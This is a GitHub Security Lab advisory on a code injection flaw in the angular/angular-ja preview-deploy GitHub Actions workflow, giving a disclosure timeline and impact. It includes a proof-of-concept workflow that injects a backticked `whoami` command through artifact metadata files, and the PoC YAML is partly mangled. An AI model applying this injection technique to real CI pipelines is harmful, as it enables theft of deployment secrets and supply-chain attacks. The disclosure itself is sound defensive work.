Coordinated Disclosure Timeline
- 2024-10-04: Report through HackerOne Bug Bounty Program.
- 2024-10-05: PoC recording on a repository copy sent to Adobe.
- 2024-10-14: Vulnerability remediated by disabling the workflow.
Summary
angular/angular-ja repository is vulnerable to a code injection in its adev-preview-deploy.yml workflow which may an attacker to gain write permissions for the pull_request scope and leak the Firebase token.
Project
Angular JA
Tested Version
Latest commit at the time of reporting
Details
Code Injection in adev-preview-deploy.yml workflow. (GHSL-2024-338)
The adev-preview-deploy.yml workflow can be triggered by a successful run of the Build adev for preview deployment workflow.
on:
workflow_run:
workflows: ['Build adev for preview deployment']
types: [completed]
An attacker can send a Pull Request to the repository and modify the adev-preview-build.yml so that when a pull request is created, malicious artifacts are uploaded. This PR will trigger the execution of adev-preview-build.yml which will upload artifacts with arbitrary content and trigger the execution of the vulnerable adev-preview-deploy.yml workflow which will download the artifacts and interpolate its contents into a shell script.
- name: Download adev preview artifact from previous workflow run
uses: actions/download-artifact@v4
with:
name: adev-preview
path: ${{ env.BUILD_DIR }}
github-token: '${{secrets.GITHUB_TOKEN}}'
run-id: ${{ github.event.workflow_run.id }}
...
- name: Extract pull request number
id: pr-number
run: |
PR_NUMBER=$(cat ./$BUILD_DIR/__metadata__pull_number.txt)
echo "value=$PR_NUMBER" >> $GITHUB_OUTPUT
- name: Extract commit hash
...
- run: echo ${{ steps.pr-number.outputs.value }} ${{ steps.commit-hash.outputs.value }}
Impact
Since the vulnerable workflow runs with Pull Requests: write permissions, an attacker will be able to modify any Pull Requests. Moreover, an attacker will also get access to the FIREBASE_SERVICE_ACCOUNT secret which will allow them to deploy arbitrary code to Firebase. An attacker could use this token to poison the angular.jp site and add links to malicious artifacts, etc .
PoC
- Fork angular/angular-ja
- Create a new git branch: git checkout -b test
- Modify adev-preview-build.yml so that its code is:
```yaml
name: Build adev for preview deployment
on:
pull_request:
jobs:
adev-build:
runs-on: ubuntu-latest
steps:
- name: Inject pull request number
run: echo ‘
whoami’ » __metadata__pull_number.txt - name: Inject commit hash
run: echo ‘
whoami’ » __metadata__commit_hash.txt - uses: actions/upload-artifact@v4 with: name: adev-preview path: . ```
- name: Inject pull request number
run: echo ‘
- Commit the changes: git add . ; git commit -m “add payload”
- Create a Pull Request against angular/angular-ja: gh pr create (follow steps)
- Go to the angular/angular-ja GitHub Repo and navigate to the Actions tab. Wait for the preview deploy action to complete and observe the output of the
- run: echo ${{ steps.pr-number.outputs.value }} ${{ steps.commit-hash.outputs.value }}step which should be:
runner runner
This is just a PoC to proof code execution. Since the FIREBASE_SERVICE_ACCOUNT is passed to the runner, an attacker could easily steal it and use it to deploy arbitrary content to angular.jp which could be use to attack developers or as part of a supply chain attack.
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-338 in any communication regarding this issue.